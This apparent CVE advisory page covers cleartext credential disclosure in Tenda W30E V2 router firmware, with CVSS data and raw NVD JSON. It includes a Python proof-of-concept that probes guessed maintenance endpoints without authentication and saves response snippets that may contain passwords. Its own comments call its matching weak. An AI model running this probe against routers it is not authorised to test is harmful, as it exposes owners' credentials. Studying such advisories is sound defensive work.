Security Vulnerability Report
CVE-2026-24430 CVSS 7.5 HIGH

CVE-2026-24430

Published: 2026-01-26 18:16:40
Last Modified: 2026-01-28 20:16:52

Description

Shenzhen Tenda W30E V2 firmware versions up to and including V16.01.0.19(5037) disclose sensitive account credentials in cleartext within HTTP responses generated by the maintenance interface. Because the management interface is accessible over unencrypted HTTP by default, credentials may be exposed to network-based interception.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:o:tenda:w30e_firmware:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:tenda:w30e:2.0:*:*:*:*:*:*:* - NOT VULNERABLE
Tenda W30E V2 固件 V16.01.0.19(5037) 及之前所有版本

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3
"""
CVE-2026-24430 PoC - Tenda W30E V2 Plaintext Credentials Disclosure
Author: Security Researcher
Reference: https://www.vulncheck.com/advisories/tenda-w30e-v2-http-responses-expose-plaintext-credentials

How this script works (see exploit_cve_2026_24430): each path in a fixed
list is fetched once with an unauthenticated GET over plain HTTP; a 200
response whose body contains one of a handful of keywords is recorded,
together with the first 500 characters of that body.  Nothing is parsed
or verified, so a recorded endpoint is a candidate for manual review,
not proof that credentials were disclosed.  Because the CVE is about
cleartext credentials in these responses, the recorded snippet (and the
JSON printed from it in the __main__ block) must be handled as sensitive
data.
"""
import requests
import sys
import json


def exploit_cve_2026_24430(target_ip, target_port=80):
    """
    Probe a Tenda W30E V2 management interface for CVE-2026-24430.

    Sends a GET (no redirects, 10 s timeout, no authentication) to each
    path in ``endpoints`` under ``http://target_ip:target_port`` and
    records every path that answers 200 with a body containing one of the
    strings in ``credential_keywords``.  Progress is printed to stdout.

    Args:
        target_ip: Router host (IP address or hostname) used to build the URL.
        target_port: Router web port (default: 80).

    Returns:
        dict with keys ``target``, ``port``, ``vulnerability``,
        ``credentials_found`` (always empty - nothing below appends to it)
        and ``exposed_endpoints`` (one entry per matching path holding
        ``endpoint``, ``status_code``, ``response_length`` and a
        500-character ``snippet`` of the raw body), or ``None`` when no
        path matched.

    Raises:
        Network errors do not propagate: ``requests.RequestException`` is
        caught per endpoint, printed, and the loop moves on.
    """
    print(f"[*] Targeting Tenda W30E V2 at {target_ip}:{target_port}")
    print(f"[*] Exploiting CVE-2026-24430...")
    # The scheme is always plain http, matching the CVE's "unencrypted HTTP
    # by default" precondition; verify=False on the requests below applies
    # only to TLS and therefore has no effect on these URLs.
    base_url = f"http://{target_ip}:{target_port}"
    # Common maintenance interface endpoints that may expose credentials
    endpoints = [
        "/goform/SysTool1",
        "/goform/getPwd",
        "/goform/userMng",
        "/goform/getUserInfo",
        "/admin/user.conf",
        "/cgi-bin/userMng.cgi",
        "/cgi-bin/admin/sysTool1.cgi",
        "/cgi-bin/getPwd.cgi"
    ]
    results = {
        "target": target_ip,
        "port": target_port,
        "vulnerability": "CVE-2026-24430",
        # NOTE(review): this list is never filled in; the function only
        # records whole endpoints under "exposed_endpoints".
        "credentials_found": [],
        "exposed_endpoints": []
    }
    for endpoint in endpoints:
        try:
            print(f"[*] Testing endpoint: {endpoint}")
            # Try GET request
            response = requests.get(f"{base_url}{endpoint}", timeout=10, verify=False, allow_redirects=False)
            # Check for credentials in response
            # (allow_redirects=False means a 30x answer is not followed and
            # is silently skipped by this status check.)
            if response.status_code == 200:
                content = response.text.lower()
                # Look for credential patterns
                # NOTE(review): plain substring matching - 'user' and 'admin'
                # occur on ordinary login pages, so a hit is a weak signal and
                # the "Successfully exploited" message below is printed on any
                # such match; confirm manually before treating it as a finding.
                credential_keywords = ['password', 'pwd', 'passwd', 'admin', 'user', 'credential']
                if any(keyword in content for keyword in credential_keywords):
                    print(f"[+] Potential credentials found at {endpoint}")
                    print(f"[+] Response length: {len(response.text)} bytes")
                    results["exposed_endpoints"].append({
                        "endpoint": endpoint,
                        "status_code": response.status_code,
                        "response_length": len(response.text),
                        # Raw body excerpt - may contain the cleartext
                        # credentials the CVE describes; treat as sensitive.
                        "snippet": response.text[:500]
                    })
        except requests.exceptions.RequestException as e:
            # Connection/timeout errors are reported and the scan continues
            # with the next path; the `continue` is redundant at the end of
            # the loop body but harmless.
            print(f"[-] Error accessing {endpoint}: {str(e)}")
            continue
    if results["exposed_endpoints"]:
        # "Successfully exploited" here only means at least one keyword hit
        # was recorded, not that credentials were extracted.
        print(f"\n[!] Successfully exploited CVE-2026-24430!")
        print(f"[!] Found {len(results['exposed_endpoints'])} exposed endpoints")
        return results
    else:
        print(f"\n[-] No vulnerable endpoints found or device not affected")
        return None


if __name__ == "__main__":
    # CLI: <target_ip> [port]; exits with status 1 when no target is given.
    if len(sys.argv) < 2:
        print("Usage: python cve_2026_24430_poc.py <target_ip> [port]")
        print("Example: python cve_2026_24430_poc.py 192.168.0.1 80")
        sys.exit(1)
    target = sys.argv[1]
    # A non-numeric port argument raises ValueError here (not caught).
    port = int(sys.argv[2]) if len(sys.argv) > 2 else 80
    result = exploit_cve_2026_24430(target, port)
    if result:
        # Dumps the full result, including each raw 500-character snippet,
        # to stdout - redirecting this to a file stores any disclosed
        # credentials in cleartext.
        print("\n[+] Results:")
        print(json.dumps(result, indent=2))

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-24430", "sourceIdentifier": "[email protected]", "published": "2026-01-26T18:16:40.423", "lastModified": "2026-01-28T20:16:51.880", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Shenzhen Tenda W30E V2 firmware versions up to and including V16.01.0.19(5037) disclose sensitive account credentials in cleartext within HTTP responses generated by the maintenance interface. Because the management interface is accessible over unencrypted HTTP by default, credentials may be exposed to network-based interception."}, {"lang": "es", "value": "Las versiones de firmware de Shenzhen Tenda W30E V2 hasta e incluyendo la V16.01.0.19(5037) revelan credenciales de cuenta sensibles en texto claro dentro de las respuestas HTTP generadas por la interfaz de mantenimiento. Debido a que la interfaz de gestión es accesible a través de HTTP sin cifrar por defecto, las credenciales pueden quedar expuestas a la interceptación basada en la red."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", 
"modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-201"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:tenda:w30e_firmware:*:*:*:*:*:*:*:*", "versionEndIncluding": "16.01.0.19\\(5037\\)", "matchCriteriaId": "4DB07B19-71FC-4936-98BD-36A8B3B7CBF0"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:tenda:w30e:2.0:*:*:*:*:*:*:*", "matchCriteriaId": "56B9C2BB-D36E-40F8-83FF-FC919337F6BD"}]}]}], "references": [{"url": "https://www.tendacn.com/product/W30E", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.vulncheck.com/advisories/tenda-w30e-v2-http-responses-expose-plaintext-credentials", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}